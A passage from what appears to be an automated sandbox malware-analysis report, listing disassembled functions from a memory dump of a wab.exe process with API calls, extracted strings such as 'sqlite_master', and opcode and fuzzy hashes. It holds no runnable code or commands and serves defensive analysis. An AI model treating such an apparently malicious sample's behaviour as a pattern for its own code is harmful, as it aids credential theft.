                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                      • memcpy.MSVCRT ref: 0040B248
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@$memcpy$mallocwcslen
                                      • String ID:
                                      • API String ID: 3023356884-0
                                      • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                      • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: @
                                      • API String ID: 3510742995-2766056989
                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@??3@memcpymemset
                                      • String ID:
                                      • API String ID: 1865533344-0
                                      • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                      • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                      APIs
                                      • strlen.MSVCRT ref: 0040B0D8
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                      • memcpy.MSVCRT ref: 0040B159
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@$memcpy$mallocstrlen
                                      • String ID:
                                      • API String ID: 1171893557-0
                                      • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                      • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                      APIs
                                      • memset.MSVCRT ref: 004144E7
                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                        • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                      • memset.MSVCRT ref: 0041451A
                                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                      • String ID:
                                      • API String ID: 1127616056-0
                                      • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                      • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: sqlite_master
                                      • API String ID: 438689982-3163232059
                                      • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                      • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                      APIs
                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                      • wcscpy.MSVCRT ref: 00414DF3
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                      • String ID:
                                      • API String ID: 3917621476-0
                                      • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                      • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                      APIs
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                      • _snwprintf.MSVCRT ref: 00410FE1
                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                      • _snwprintf.MSVCRT ref: 0041100C
                                      • wcscat.MSVCRT ref: 0041101F
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                      • String ID:
                                      • API String ID: 822687973-0
                                      • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                      • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                      • malloc.MSVCRT ref: 00417459
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$??3@malloc
                                      • String ID:
                                      • API String ID: 4284152360-0
                                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                      • RegisterClassW.USER32(?), ref: 00412428
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                      • String ID:
                                      • API String ID: 2678498856-0
                                      • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                      • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                      APIs
                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item
                                      • String ID:
                                      • API String ID: 3888421826-0
                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                      APIs
                                      • memset.MSVCRT ref: 00417B7B
                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                      • GetLastError.KERNEL32 ref: 00417BB5
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastLockUnlockmemset
                                      • String ID:
                                      • API String ID: 3727323765-0
                                      • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                      • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                      • malloc.MSVCRT ref: 00417407
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$??3@malloc
                                      • String ID:
                                      • API String ID: 4284152360-0
                                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                      APIs
                                      • memset.MSVCRT ref: 0040F673
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                      • strlen.MSVCRT ref: 0040F6A2
                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                      • String ID:
                                      • API String ID: 2754987064-0
                                      • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                      • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                      APIs
                                      • memset.MSVCRT ref: 0040F6E2
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                      • strlen.MSVCRT ref: 0040F70D
                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                      • String ID:
                                      • API String ID: 2754987064-0
                                      • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                      • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                      APIs
                                      • memset.MSVCRT ref: 00402FD7
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                      • strlen.MSVCRT ref: 00403006
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                      • String ID:
                                      • API String ID: 2754987064-0
                                      • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                      • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                      APIs
                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                      • String ID:
                                      • API String ID: 764393265-0
                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                      APIs
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Time$System$File$LocalSpecific
                                      • String ID:
                                      • API String ID: 979780441-0
                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                      APIs
                                      • memcpy.MSVCRT ref: 004134E0
                                      • memcpy.MSVCRT ref: 004134F2
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$DialogHandleModuleParam
                                      • String ID:
                                      • API String ID: 1386444988-0
                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                      APIs
                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: InvalidateMessageRectSend
                                      • String ID: d=E
                                      • API String ID: 909852535-3703654223
                                      • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                      • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                      APIs
                                      • wcschr.MSVCRT ref: 0040F79E
                                      • wcschr.MSVCRT ref: 0040F7AC
                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: wcschr$memcpywcslen
                                      • String ID: "
                                      • API String ID: 1983396471-123907689
                                      • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                      • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                      APIs
                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                      • _memicmp.MSVCRT ref: 0040C00D
                                      • memcpy.MSVCRT ref: 0040C024
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FilePointer_memicmpmemcpy
                                      • String ID: URL
                                      • API String ID: 2108176848-3574463123
                                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _snwprintfmemcpy
                                      • String ID: %2.2X
                                      • API String ID: 2789212964-323797159
                                      • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                      • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _snwprintf
                                      • String ID: %%-%d.%ds
                                      • API String ID: 3988819677-2008345750
                                      • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                      • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                      APIs
                                      • memset.MSVCRT ref: 0040E770
                                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: MessageSendmemset
                                      • String ID: F^@
                                      • API String ID: 568519121-3652327722
                                      • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                      • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PlacementWindowmemset
                                      • String ID: WinPos
                                      • API String ID: 4036792311-2823255486
                                      • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                      • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
